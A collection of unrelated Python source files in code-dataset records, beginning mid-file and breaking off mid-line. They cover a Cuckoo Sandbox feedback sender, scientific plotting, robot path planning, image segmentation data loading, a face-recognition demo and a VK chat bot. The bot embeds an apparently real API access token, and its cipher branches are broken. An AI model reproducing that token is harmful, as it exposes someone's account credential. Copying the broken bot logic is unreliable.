settings.MONGO\n\n def send_exception(self, exception, request=None):\n \"\"\"\n To be used during exception handling.\n @param exception: The exception class\n @param request: Django request object\n @return:\n \"\"\"\n feedback = CuckooFeedbackObject(was_automated=True)\n feedback.message = \"Exception `%s` encountered\" % str(type(exception))\n\n if isinstance(exception, (CuckooFeedbackError, Http404)):\n return\n elif isinstance(exception, (TemplateDoesNotExist,\n TemplateSyntaxError)):\n feedback.add_error(\"Django templating error\")\n\n feedback.add_error(traceback.format_exc())\n feedback_options = {\n \"include_analysis\": False,\n \"include_json_report\": False,\n \"include_memdump\": False,\n \"include_config\": True\n }\n\n if request:\n if hasattr(request, \"resolver_match\") and request.resolver_match:\n if request.method == \"POST\" and request.is_ajax():\n request_kwargs = json.loads(request.body)\n else:\n request_kwargs = request.resolver_match.kwargs\n elif request.method == \"GET\":\n request_kwargs = request.GET\n elif request.method == \"POST\":\n request_kwargs = request.POST\n else:\n request_kwargs = None\n\n if request_kwargs:\n if \"task_id\" in request_kwargs:\n task_id = int(request_kwargs[\"task_id\"])\n elif \"analysis_id\" in request_kwargs:\n task_id = int(request_kwargs[\"analysis_id\"])\n else:\n task_id = None\n\n if task_id:\n feedback_options[\"analysis_id\"] = task_id\n feedback_options[\"include_analysis\"] = True\n feedback_options[\"include_json_report\"] = True\n feedback_options[\"include_memdump\"] = False\n\n if feedback_options[\"include_json_report\"]:\n feedback.include_report(analysis_id=feedback_options[\"analysis_id\"])\n\n if feedback_options[\"include_analysis\"]:\n feedback.include_analysis(include_memdump=feedback_options[\"include_memdump\"])\n\n try:\n feedback.validate()\n except (CuckooFeedbackError, ValidationError) as ex:\n raise CuckooFeedbackError(\"Could not validate feedback object: %s\" % str(ex))\n\n return self._send(feedback)\n\n def send(self, analysis_id=None, name=\"\", email=\"\", message=\"\", company=\"\",\n include_json_report=False, include_analysis=False,\n include_memdump=False, was_automated=False):\n if not config(\"cuckoo:feedback:enabled\"):\n raise CuckooFeedbackError(\n \"Feedback not enabled in config or feedback options missing\"\n )\n\n feedback = CuckooFeedbackObject(\n name=name,\n company=company,\n email=email,\n message=message,\n was_automated=was_automated\n )\n\n if include_json_report:\n if not analysis_id or not isinstance(analysis_id, int):\n raise CuckooFeedbackError(\"analysis_id cannot be empty while including the json_report\")\n\n feedback.include_report(analysis_id=analysis_id)\n\n if include_analysis:\n feedback.include_analysis(include_memdump=include_memdump)\n\n feedback_id = self._send(feedback)\n return feedback_id\n\n def _send(self, feedback):\n try:\n feedback.validate()\n except CuckooFeedbackError as ex:\n raise CuckooFeedbackError(\"Could not validate feedback object: %s\" % str(ex))\n\n feedback = feedback.to_dict()\n headers = {\n \"Content-type\": \"application/json\",\n \"Accept\": \"text/plain\",\n \"User-Agent\": \"Cuckoo %s\" % version\n }\n\n try:\n resp = requests.post(\n url=self.endpoint,\n json=feedback,\n headers=headers\n )\n if not resp.status_code == 200:\n raise CuckooFeedbackError(\"the remote server did not respond correctly\")\n\n resp = json.loads(resp.content)\n if \"status\" not in resp or not resp[\"status\"]:\n raise CuckooFeedbackError(resp[\"message\"])\n\n return resp[\"feedback_id\"]\n except requests.exceptions.RequestException as e:\n msg = \"Invalid response from Cuckoo feedback server: %s\", str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n except CuckooFeedbackError as e:\n msg = \"Cuckoo feedback error while sending: %s\", str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n except Exception as e:\n msg = \"Unknown feedback error while sending: %s\" % str(e)\n log.error(msg)\n raise CuckooFeedbackError(msg)\n\nclass CuckooFeedbackObject:\n def __init__(self, message=None, email=None, name=None, company=None, was_automated=False):\n self.was_automated = was_automated\n self.message = message\n self.errors = []\n self.contact = {\n \"name\": config(\"cuckoo:feedback:name\"),\n \"company\": config(\"cuckoo:feedback:company\"),\n \"email\": config(\"cuckoo:feedback:email\"),\n }\n self.export = None\n self.report_info = {}\n self.report = None\n\n def include_report(self, analysis_id):\n report = AbstractReport(analysis_id=analysis_id)\n if report.analysis_errors:\n for error in report.analysis_errors:\n self.add_error(error)\n\n # attach additional analysis information\n if \"file\" in report.analysis_target:\n self.report_info[\"file\"] = {\n k: v for k, v in report.analysis_target[\"file\"].items()\n if isinstance(v, (str, unicode, int, float))\n }\n self.report_info[\"file\"][\"task_id\"] = analysis_id\n else:\n self.report_info[\"url\"] = {\"url\": report.analysis_target[\"url\"]}\n self.report_info[\"url\"][\"task_id\"] = analysis_id\n\n self.report_info[\"analysis_id\"] = report.analysis_id\n self.report_info[\"analysis_path\"] = report.analysis_info[\"analysis_path\"]\n self.report = report\n\n def include_analysis(self, include_memdump=False):\n if not self.report.src:\n raise CuckooFeedbackError(\n \"Report must first be included in order to include the analysis\"\n )\n\n analysis_path = self.report.analysis_info[\"analysis_path\"]\n taken_dirs, taken_files = ExportController.get_files(analysis_path)\n\n if not include_memdump:\n taken_dirs = [z for z in taken_dirs if z[0] != \"memory\"]\n\n export = ExportController.create(task_id=self.report.analysis_id,\n taken_dirs=taken_dirs,\n taken_files=taken_files,\n report=self.report.src)\n export.seek(0)\n self.export = base64.b64encode(export.read())\n\n def add_error(self, error):\n self.errors.append(error)\n\n def validate(self):\n for expect in [\"email\", \"name\"]:\n if expect not in self.contact or not self.contact[expect]:\n raise CuckooFeedbackError(\"Missing contact information: %s\" % expect)\n\n validate_email(self.contact[\"email\"])\n\n if not self.message:\n raise CuckooFeedbackError(\"Missing feedback message\")\n\n return True\n\n def to_dict(self):\n data = {\n \"errors\": self.errors,\n \"contact\": self.contact,\n \"automated\": self.was_automated,\n \"message\": self.message,\n \"cuckoo\": {\n \"cwd\": cwd(),\n \"app\": os.environ.get(\"CUCKOO_APP\"),\n }\n }\n\n if self.report:\n data[\"analysis_info\"] = self.report_info\n\n if self.export:\n data[\"export\"] = self.export\n\n data[\"cfg\"] = Config.from_confdir(cwd(\"conf\"), sanitize=True)\n\n return data\n","sub_path":"cuckoo/core/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365620404","text":"from Aurora.settings import BASE_DIR\n\nimport json\nimport os\nimport sys\nimport glob\n\ndef run():\n dict_name = sys.argv[0]\n dict_file_path = os.path.join(BASE_DIR, 'Aurora/data/dictionary/'+dict_name+'/dictionary.json')\n data = json.load(open(dict_file_path))\n data = {k.lower(): v for k, v in data.items()}\n\n chunks = {}\n chunk_indexes = []\n \n print('Creating chunk data from Dictionary')\n for word in data:\n if not word.isalpha():\n continue\n else:\n chunk_index = word[:1]\n chunk_indexes.append(chunk_index)\n if not chunk_index in chunks:\n chunks[chunk_index] = {}\n chunks[chunk_index][word] = data[word]\n\n dict_dir = os.path.join(BASE_DIR, 'Aurora/data/dictionary/'+dict_name)\n chunks_dir = os.path.join(dict_dir, 'chunks')\n print('Deleting existing files from '+chunks_dir)\n files = glob.glob(chunks_dir+'/*')\n for f in files:\n os.remove(f)\n \n print('Creating new files in '+chunks_dir+'\\n')\n for chunk_index in chunks:\n chunk_data = chunks[chunk_index]\n output_file_path = os.path.join(chunks_dir, ''+chunk_index+'.json')\n with open(output_file_path, 'w') as file:\n print('Writing to '+output_file_path+', words count: '+str(len(chunk_data)))\n file.write(json.dumps(chunk_data))\n\nif __name__ == '__main__':\n run()\n","sub_path":"Aurora/scripts/dictionary/split_dictionary_into_chunks.py","file_name":"split_dictionary_into_chunks.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230892696","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom nemd.mpl.initialize import (set_matplot, set_axis, set_legend)\n \nfrom nemd.structure.gic import get_layer_information\n\ndef _set_temperature_profile(fontsize=None, fig_width=None, aspect=None,\n xunit=None, xlabel=\"Position\", ylable=\"Temperature (K)\", nfigs=1):\n set_matplot(fontsize=fontsize)\n fig = plt.figure(figsize=(fig_width, aspect*fig_width))\n plt.subplots_adjust(left=0.20, bottom=0.17, right=0.98,\n top=0.98, wspace=0, hspace=0.25)\n \n axes = []\n for ifig in range(nfigs):\n axes.append(plt.subplot(nfigs,1,ifig+1))\n \n if xunit == 'nm':\n _xunit = 'nm'\n else:\n _xunit = \"$\\\\AA$\"\n axes[0].set_xlabel('Position (%s)'%(_xunit))\n axes[0].set_ylabel('Temperature (K)')\n return fig, axes\n\ndef plot_temperature_profile_atom(\n dumpfile, atoms=None, lmpinput='nemd.dump', iaxis=2,\n figname=None, outfile=None,\n xunit='nm', log=None,\n dpi=300, fontsize=7, fig_width=2.8, aspect=0.9, lw=0.3, ms=5.0\n ):\n ##groups4plot=None, \n \"\"\" Plot temperature for each atom or segment. Use original atomic positions\n (atoms) and temperatures in \"dumpfile\". Note that LAMMPS use angstrom as the\n unit of length.\n \"\"\"\n ## Read temperatures\n from nemd.file import get_averaged_temperatures_atom\n temp_ave, nstructures = \\\n get_averaged_temperatures_atom(dumpfile, natoms=len(atoms))\n \n ## Read group IDs\n from nemd.file import read_group_ids\n ids = read_group_ids(lmpinput)\n\n ##\n groups4plot = []\n for name in ids.keys():\n if name is not 'fix':\n groups4plot.append(name)\n\n ##\n temps = {}\n for group in groups4plot:\n idx = np.arange(ids[group][0]-1, ids[group][1])\n n = len(idx)\n temps[group] = np.zeros((n, 3))\n temps[group][:,0] = np.ones(n)\n temps[group][:,1] = atoms.get_positions()[idx,iaxis]\n temps[group][:,2] = temp_ave[idx]\n\n if outfile is not None:\n from nemd.file import write_nemd_temperatures\n write_nemd_temperatures(outfile, temps,\n unit_length=xunit,\n nstructures=nstructures)\n \n ## cross-sectional area\n cross = 1.\n for j in range(3):\n if j != iaxis:\n cross *= atoms.cell[j,j] # A^2\n ##\n plot_temperature_profile(temps,\n xunit=xunit,\n figname=figname,\n log=log,\n cross_section=cross\n )\n\ndef plot_temperature_profile(temps, log=None,\n cross_section=None,\n xunit='nm', group4plot=None,\n figname=None, plot_layer=True,\n dpi=300, fontsize=6, lw=0.6, ms=2.0\n ):\n \"\"\"\n Parameters\n ---------------\n temps : dict of ndarray\n temps['hot'][n,3] : (number of atoms, position[A], temperature[K])\n log : DataFrame object\n cross_section : unit=[A^2]\n \"\"\"\n ##\n if log is not None:\n nfigs = 2\n fig_width = 2.5\n aspect = 1.3\n else:\n nfigs = 1\n fig_width = 2.3\n aspect = 0.9\n \n ## Setting for the figure\n fig, axes = _set_temperature_profile(\n fontsize=fontsize, fig_width=fig_width, aspect=aspect, xunit=xunit,\n nfigs=nfigs)\n \n ## plot energy\n if log is not None:\n from tips.plot import plot_energy\n heat = plot_energy(axes[1], log, cross_section=cross_section) # Watt\n \n ## unit\n if xunit == 'nm':\n xmod = 0.1\n else:\n xmod = 1.0\n \n ## plot\n for i, group in enumerate(temps.keys()):\n if group == 'hot':\n col = 'red'\n marker = '^'\n elif group == 'cold':\n col = 'blue'\n marker = 'v'\n elif 'mid' in group:\n col = 'purple'\n marker = 'o'\n else:\n continue\n \n ##\n if plot_layer:\n zpos, idx_layers = get_layer_information(temps[group][:,1], gap=1.5)\n temp_ave = np.zeros(len(zpos))\n for il in range(len(zpos)):\n temp_ave[il] = np.average(temps[group][idx_layers[il],2])\n else:\n zpos = temps[group][:,1]\n temp_ave = temps[group][:,2]\n\n axes[0].scatter(\n zpos * xmod,\n temp_ave,\n s=ms, marker=marker, linewidth=lw,\n edgecolor=col,\n facecolor='None', label=group)\n \n set_axis(axes[0])\n set_legend(axes[0], alpha=0.5, fs=6)\n \n ## save a figure\n if figname is not None:\n fig.savefig(figname, dpi=dpi, bbox_inches='tight')\n print(\" Output\", figname)\n \n return fig\n\n","sub_path":"nemd/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483842294","text":"import face_recognition\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\n\r\n \r\nknown_image = face_recognition.load_image_file(\"aditya.jpg\")\r\nencoding = face_recognition.face_encodings(known_image)[0]\r\n\r\n\r\nunknown_image = face_recognition.load_image_file(\"pic.jpg\")\r\n\r\n\r\nface_locations = face_recognition.face_locations(unknown_image)\r\nface_encodings = face_recognition.face_encodings(unknown_image, face_locations)\r\n\r\n\r\npil_image = Image.fromarray(unknown_image)\r\n\r\ndraw = ImageDraw.Draw(pil_image)\r\n\r\nfor (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings): \r\n matches = face_recognition.compare_faces([encoding], face_encoding)\r\n\r\n face_distances = face_recognition.face_distance([encoding], face_encoding)\r\n best_match_index = np.argmin(face_distances)\r\n if matches[best_match_index]:\r\n\r\n draw.rectangle(((left - 20, top - 20), (right + 20, bottom + 20)), outline=(0, 255, 0), width=20)\r\n\r\n\r\ndel draw\r\n\r\n\r\npil_image.show()\r\n","sub_path":"face recognition.py","file_name":"face recognition.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72513209","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport math\nimport time\n\n# 関数群\n## 入力にかかる行列計算用\ndef calc_B_T(dt, theta):\n B_T = ([[dt*math.cos(theta), dt*math.sin(theta), 0, 1, 0],\n [0 , 0 , dt, 0, 1]])\n return B_T\n\n# 変数群\n## 状態ベクトルにかかる行列\nA = [\n [1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]\n]\n\n# クラス群\n\n## シミュレーション用ロボットモデル\nclass SimRobotModel():\n ### コンストラクタ\n def __init__(self):\n #### 速度に関する制限\n self.max_vel = 1.4\n self.min_vel = 0.0\n self.max_acc = 9.0\n\n #### 回転速度に関する制限\n self.max_ang_vel = 60 * math.pi/180\n self.min_ang_vel = -60 * math.pi/180\n self.max_ang_acc = 120 * math.pi/180\n\n ### 取りうる状態ベクトルの計算\n def predict_status(self, u, status, dt, pre_step):\n next_status = []\n\n for i in range(pre_step):\n B_T = calc_B_T(dt, status[2])\n status = list(\n np.dot(status, A) + np.dot(u, B_T)\n )\n next_status.append(status)\n return next_status\n\n## Dynamic Window Approachのコントローラ\nclass DWA():\n ### コンストラクタ\n def __init__(self):\n #### モデル呼び出し\n self.simbot = SimRobotModel()\n\n #### 分解能\n self.delta_vel = 0.1\n self.delta_ang_vel = math.pi/180\n\n #### シミュレーションの時間、間隔およびステップの宣言\n self.pre_time = 2\n self.samp_time = 0.1\n self.pre_step = int(self.pre_time/self.samp_time)\n\n ### 取りうる入力の組み合わせ全探索\n def _calc_u_set(self, status):\n calc_max_vel = self.simbot.max_acc*self.samp_time\n calc_max_ang_vel = self.simbot.max_ang_acc*self.samp_time\n v_set = np.arange(\n max(\n status[3]-calc_max_vel,\n self.simbot.min_vel\n ),\n min(\n status[3]+calc_max_vel,\n self.simbot.max_vel\n ),\n self.delta_vel\n )\n o_set = np.arange(\n max(\n status[4]-calc_max_ang_vel,\n self.simbot.min_ang_vel\n ),\n min(\n status[4]+calc_max_ang_vel,\n self.simbot.max_ang_vel\n ),\n self.delta_ang_vel\n )\n return v_set, o_set\n\n ### 取りうる経路の計算\n def make_path(self, status):\n v_set, o_set = self._calc_u_set(status)\n paths = []\n\n for vel in v_set:\n for ang_vel in o_set:\n path = self.simbot.predict_status([vel, ang_vel], status, self.samp_time, self.pre_step)\n paths.append(path)\n\n return paths\n\ndef main(status):\n dwa_sim = DWA()\n paths = dwa_sim.make_path(status)\n \n return paths\n \nif __name__ == '__main__':\n start = time.time()\n status = main()\n finished = time.time() -start\n print(\"{0}\".format(finished) + \"[sec]\")\n print(status)","sub_path":"lib/.ipynb_checkpoints/makepath-checkpoint.py","file_name":"makepath-checkpoint.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130957296","text":"import ConfigParser\nimport logging\n\nclass Config:\n def __init__(self, configFile):\n self.Config = ConfigParser.ConfigParser()\n self.Config.read(configFile)\n logging.info(self.Config.sections())\n\n def ConfigSectionMap(self, section):\n dict1 = {}\n options = self.Config.options(section)\n for option in options:\n try:\n dict1[option] = self.Config.get(section, option)\n if dict1[option] == -1:\n logger.debug(\"skip: %s\" % option)\n except:\n logging.error(\"exception on %s!\" % option)\n dict1[option] = None\n return dict1\n","sub_path":"src/generate_snapshot_data/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221745241","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\nimport os\n\nDIR = os.path.dirname(__file__)\n\nTRAIN_IMAGE_PATH = os.path.join(DIR, \"../dataset/training_data/train/\")\nTEST_IMAGE_PATH = os.path.join(DIR, \"../dataset/training_data/test_data/\")\nNUMPY_PATH = os.path.join(DIR, \"../dataset/training_data/npydata/\")\n\nIMAGE_PATH = TRAIN_IMAGE_PATH + \"img/\"\nLABEL_PATH = TRAIN_IMAGE_PATH + \"label/\"\n\n\nclass dataProcess(object):\n \"\"\"\n A class used to prepare data for train and test\n It will first store images in form of numpy array\n Then, it will help the main program to load the numpy array for training\n \"\"\"\n\n def __init__(self, width, height, data_path=IMAGE_PATH, label_path=LABEL_PATH, npy_path=NUMPY_PATH,\n test_path=TEST_IMAGE_PATH,\n img_type=\".jpg\"):\n self.width = width\n self.height = height\n self.data_path = data_path\n self.label_path = label_path\n self.img_type = img_type\n self.test_path = test_path\n self.npy_path = npy_path\n\n def createTrainData(self):\n i = 0\n print(\"-\" * 30)\n print(\"Creating train images...\")\n print(\"-\" * 30)\n\n imgs = os.listdir(self.data_path)\n imgs = [img for img in imgs if img.endswith(self.img_type)]\n print(len(imgs))\n # Create numpy array to store all data\n images_train = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n labels_train = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n # Loop over all images\n for img in imgs:\n # Load image and label\n image = load_img(self.data_path + img, target_size=(self.width, self.height), grayscale=True)\n label = load_img(self.label_path + img, target_size=(self.width, self.height), grayscale=True)\n # Transform image and label to arrays\n image = img_to_array(image)\n label = img_to_array(label)\n # Store image and label arrays in numpy array\n images_train[i] = image\n labels_train[i] = label\n i += 1\n print(\"Done {0}/{1} images\".format(i, len(imgs)))\n print(\"Loading done.\")\n np.save(self.npy_path + \"images_train.npy\", images_train)\n np.save(self.npy_path + \"labels_train.npy\", labels_train)\n print(\"Saving data to .npy files done.\")\n\n def createTestData(self):\n i = 0\n print(\"-\" * 30)\n print(\"Creating test images...\")\n print(\"-\" * 30)\n\n imgs = os.listdir(self.test_path)\n imgs = sorted([img for img in imgs if img.endswith(self.img_type)])\n print(len(imgs))\n # Create numpy array to store all data\n images_test = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n images_info = np.ndarray((len(imgs), 3))\n\n # Loop over all images\n for img in imgs:\n # Load image\n ori_image = load_img(self.test_path + img)\n width, height = ori_image.width, ori_image.height\n image = load_img(self.test_path + img, target_size=(self.width, self.height), grayscale=True)\n # Transform image to arrays\n image = img_to_array(image)\n # Store image array in numpy array\n images_test[i] = image\n images_info[i] = (int(img[:-4]), width, height)\n i += 1\n print(\"Done {0}/{1} images\".format(i, len(imgs)))\n print(\"Loading done.\")\n np.save(self.npy_path + \"images_test.npy\", images_test)\n np.save(self.npy_path + \"images_info.npy\", images_info)\n print(\"Saving data to .npy files done.\")\n\n def loadTrainData(self):\n print(\"-\" * 30)\n print(\"Load train images...\")\n print(\"-\" * 30)\n # Load numpy files\n images_train = np.load(self.npy_path + \"images_train.npy\")\n labels_train = np.load(self.npy_path + \"labels_train.npy\")\n # Prepocess data\n images_train = images_train.astype('float32')\n labels_train = labels_train.astype('float32')\n images_train /= 255\n labels_train /= 255\n labels_train[labels_train > 0.9] = 1\n labels_train[labels_train <= 0.9] = 0\n return images_train, labels_train\n\n def loadTestData(self):\n print(\"-\" * 30)\n print(\"Load test images...\")\n print(\"-\" * 30)\n # Load numpy files\n images_test = np.load(self.npy_path + \"images_test.npy\")\n images_info = np.load(self.npy_path + \"images_info.npy\")\n # Prepocess data\n images_test = images_test.astype('float32')\n images_test /= 255\n return images_test, images_info\n\n\nif __name__ == \"__main__\":\n mydata = dataProcess(512, 512)\n # mydata.loadTrainData()\n # mydata.createTrainData()\n mydata.createTestData()\n","sub_path":"UNet/src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199255001","text":"import requests\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\nvk_session = vk_api.VkApi(token='f1dc08e74f4757ddfc8a358c1c676889d18ee81fa22bb5e52ba76ebc02061dc693add7fcb342513f2a686')\n\nGlobal_i = 0\nlongpoll = VkLongPoll(vk_session)\nvk = vk_session.get_api()\nfor event in longpoll.listen():\n if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n if event.text == 'Начать':\n vk.messages.send(\n user_id=event.user_id,\n message='Привет! Я твой персональный бот :)', random_id=Global_i)\n Global_i += 1\n\n elif event.text == 'Привет' or event.text == 'Здрасте' or event.text == 'Здраствуй' or event.text == 'Здорово':\n vk.messages.send(\n user_id=event.user_id,\n message='Привет', random_id=Global_i)\n Global_i += 1\n else: \n event.text = event.text.split() \n if len(event.text) >= 3 and event.text[0].lower() == 'зашифровать': \n word = event.text[1] \n n = event.text[2] \n vk.messages.send() \n elif len(event.type) >= 3 and event.text[0].lower() == 'расшифровать': \n word = event.text[1] \n n = event.text[2] \n vk.messages.send() \n else:\n vk.messages.send(\n user_id=event.user_id,\n message='Не понял :(', random_id=Global_i)\n Global_i += 1\n","sub_path":"Desktop/KPOK 2019/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60300746","text":"#!/usr/bin/python3\n\nfrom argparse import ArgumentParser\nimport re\nimport os.path\nimport sys\nimport os\n\nparser = ArgumentParser()\nparser.add_argument('--config-file', type=str, help='Configuration file (to be documented)', required=True)\nparser.add_argument('--action', type=str, help='Action: \"add\" or \"remove\"', required=True)\nargs = parser.parse_args()\n\nif not args.action in ('add', 'remove'):\n print(\"Action must be 'add' or 'remove'\", file=sys.stderr)\n sys.exit(1)\n\nrex_sensor = re.compile(r'^\\s*I2C\\s+(\\S+)\\s+(\\S+)\\s+(\\S+)\\s*$')\nrex_emptyline = re.compile(r'^\\s*$')\n\nsensorsfile = open(args.config_file)\nfor s in sensorsfile:\n if rex_emptyline.search(s):\n continue\n match = rex_sensor.search(s)\n if match is None:\n print(\"Nix match\", file=sys.stderr)\n sys.exit(1)\n modname, address, adapter = match.group(1), match.group(2), match.group(3)\n if not os.path.exists(adapter):\n print(\"No such adapter: \"+adapter, file=sys.stderr)\n sys.exit(1)\n\n if args.action == 'add':\n with open(adapter + '/new_device', 'w') as new_device:\n new_device.write('%s %s' % (modname, address))\n else:\n with open(adapter + '/delete_device', 'w') as delete_device:\n delete_device.write(address)\n","sub_path":"bin/openheating-sensors.py","file_name":"openheating-sensors.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373642208","text":"import webbrowser\r\nimport time\r\n\r\n#App/script-which Remind user to take necessary interval time to time, here a video song will be played after certain interval (Time is provide below-make it minimal to check the prgrm) \r\n#interval periods are very miniml due to testing purposes\r\n\r\n\r\n# count determined the no of times you need to take break\r\ncount = 3\r\n\r\nwhile count > 0:\r\n\r\n\t#Certain action (Playing a video) will take place every 10 sec as time.sleep=10\r\n time.sleep(10)\r\n webbrowser.open(\"https://www.youtube.com/watch?v=vNLZAmLqibo\")\r\n count -= 1\r\n","sub_path":"My Attempts/time_4_relax.py","file_name":"time_4_relax.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577461441","text":"from .Ball import *\nimport pymunk\n\nclass MarbleBall(Ball):\n def __init__(self, center, bouncingFactor = 1):\n marbleMass = 0.05\n marbleRadius = 3\n marbleCenter = center\n \n self.bouncingFactor = bouncingFactor\n\n Ball.__init__(self, marbleMass, marbleRadius, marbleCenter)\n print('Marble Ball is created at position ' + str(center) + '.')\n\n def getType(self):\n return \"marbleBall\"\n","sub_path":"chain_reaction/chain_app/library/MarbleBall.py","file_name":"MarbleBall.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385781142","text":"import os\nimport time\nimport numpy as np\nimport tensorflow as tf\n\n# VGG_MEAN = [123.68, 116.779, 103.939] # [R, G, B]\nVGG_MEAN = [103.939, 116.779, 123.68] # [B, G, R]\nclass VGG16:\n def __init__(self, vgg16_npy_path, prof_type=None, infer=False):\n \"\"\"\n load pre-trained weights from path\n :param vgg16_npy_path: file path of vgg16 pre-trained weights\n \"\"\"\n \n self.infer = infer\n self.gamma_var = []\n\n if prof_type is None:\n self.prof_type = \"all-one\"\n else:\n self.prof_type = prof_type\n\n # load pre-trained weights\n # if vgg16_npy_path is not None:\n self.data_dict = np.load(vgg16_npy_path, encoding='latin1').item()\n print(\"npy file loaded\")\n \n # input information\n self.H, self.W, self.C = 32, 32, 3\n self.classes = 10\n \n # operation dictionary\n self.prob_dict = {}\n self.loss_dict = {}\n self.accu_dict = {}\n\n # parameter dictionary\n self.para_dict = {}\n\n def build(self, dp):\n \"\"\"\n load variable from npy to build the VGG\n :param rgb: rgb image [batch, height, width, 3] values scaled [0, 1]\n \"\"\"\n\n # input placeholder\n self.x = tf.placeholder(tf.float32, [None, self.H, self.W, self.C])\n self.y = tf.placeholder(tf.float32, [None, self.classes])\n \n self.dp = dp \n print(\"Will optimize at DP=\", self.dp)\n \n start_time = time.time()\n print(\"build model started\")\n rgb_scaled = self.x * 255.0\n\n # normalize input by VGG_MEAN\n red, green, blue = tf.split(axis=3, num_or_size_splits=3, value=rgb_scaled)\n assert red.get_shape().as_list()[1:] == [self.H, self.W, 1]\n assert green.get_shape().as_list()[1:] == [self.H, self.W, 1]\n assert blue.get_shape().as_list()[1:] == [self.H, self.W, 1]\n self.x = tf.concat(axis=3, values=[\n blue - VGG_MEAN[0],\n green - VGG_MEAN[1],\n red - VGG_MEAN[2],\n ])\n assert self.x.get_shape().as_list()[1:] == [self.H, self.W, self.C]\n \n # declare and initialize the weights of VGG16\n with tf.variable_scope(\"VGG16\"):\n for k, v in sorted(self.data_dict.items()):\n if 'conv' in k and 'gamma' not in k:\n # transfer Convolutional filters trained on ImageNet to our model\n (conv_filter, gamma), conv_bias = self.get_conv_filter(k), self.get_bias(k)\n self.para_dict[k] = [conv_filter, conv_bias]\n self.para_dict[k+\"_gamma\"] = gamma\n self.gamma_var.append(self.para_dict[k+\"_gamma\"])\n\n # (self.conv1_2_W, gamma), self.conv1_2_b = self.get_conv_filter(\"conv1_2\"), self.get_bias(\"conv1_2\")\n # self.para_dict[k] = [conv_filter, conv_bias]\n # self.para_dict[k+\"_gamma\"] = gamma\n # self.gamma_var.append(self.para_dict[k+\"_gamma\"])\n\n # (self.conv2_1_W, gamma), self.conv2_1_b = self.get_conv_filter(\"conv2_1\"), self.get_bias(\"conv2_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv2_2_W, gamma), self.conv2_2_b = self.get_conv_filter(\"conv2_2\"), self.get_bias(\"conv2_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_1_W, gamma), self.conv3_1_b = self.get_conv_filter(\"conv3_1\"), self.get_bias(\"conv3_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_2_W, gamma), self.conv3_2_b = self.get_conv_filter(\"conv3_2\"), self.get_bias(\"conv3_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_3_W, gamma), self.conv3_3_b = self.get_conv_filter(\"conv3_3\"), self.get_bias(\"conv3_3\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_1_W, gamma), self.conv4_1_b = self.get_conv_filter(\"conv4_1\"), self.get_bias(\"conv4_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_2_W, gamma), self.conv4_2_b = self.get_conv_filter(\"conv4_2\"), self.get_bias(\"conv4_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_3_W, gamma), self.conv4_3_b = self.get_conv_filter(\"conv4_3\"), self.get_bias(\"conv4_3\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_1_W, gamma), self.conv5_1_b = self.get_conv_filter(\"conv5_1\"), self.get_bias(\"conv5_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_2_W, gamma), self.conv5_2_b = self.get_conv_filter(\"conv5_2\"), self.get_bias(\"conv5_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_3_W, gamma), self.conv5_3_b = self.get_conv_filter(\"conv5_3\"), self.get_bias(\"conv5_3\")\n # self.gamma_var.append(gamma)\n\n # user specified fully connected layers\n # TEMPORARY to 25 for experiment of cutoff \n fc_W = tf.get_variable(name=\"fc_1_W\", shape=(512, 512), initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), dtype=tf.float32)\n fc_b = 